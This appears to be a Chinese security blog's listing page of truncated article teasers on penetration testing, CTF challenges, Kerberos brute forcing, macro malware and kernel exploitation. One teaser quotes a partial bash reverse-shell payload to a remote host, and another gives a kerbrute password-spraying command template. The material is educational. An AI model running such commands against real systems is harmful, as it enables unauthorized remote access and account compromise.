在上一篇 一些相见恨晚的BurpSuite插件推荐 文章中简单介绍了下 Turbo Intruder 这个插件，这次来详细讲解下这个插件的使用，灵活运用该插件可以很好地提高我们的渗透效率。Turbo Int...

Bash Special Redirection 分析安全脉搏SecPulse.Com独家发文，如需转载，请先联系授权。0x00 Background在反弹 shell 的时候经常遇到这样的 payload:bash -i 1>&/dev/tcp/${H...

0x01 暴力破解使用kerbrute.py：python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -ou...

漏洞简介VB引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相...

这是 酒仙桥六号部队 的第 40 篇文章。全文共计2824个字，预计阅读时长10分钟。前言说来话长, 在一个月黑风高的晚上，突然接到一个渗透任务，貌似还挺急，在客户充分授权的情况...

前言在打靶场的过程中使用Nmap时发现点小问题，借此机会详细分析下情况，于是有了这篇文章。本文包含以下内容：1. Nmap抓包分析2. 内网下绕过Windows防火墙扫描存活主机这里主要是针...

该题目贴合实际，在实战中经常遇到此类宏病毒。将Office文档中嵌入以VBA(Visual Basic forApplications)编写的宏代码脚本，当运行Office文档时，便可以执行各种命令。VBA脚本文件重定向能够将脚...

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如...

这是 酒仙桥六号部队 的第 122 篇文章。全文共计2205个字，预计阅读时长7分钟。背景在一次授权的渗透测试中，由于使用客户提供的机器进行测试操作，一开始通过弱口令的爆破...

前言本文我们通过我们的老朋友heap_bof来讲解Linux kernel中任意地址申请的其中一种比赛比较常用的利用手法modprobe_path（虽然在高版本内核已经不可用了但ctf比赛还是比较常用的）。再通过两道...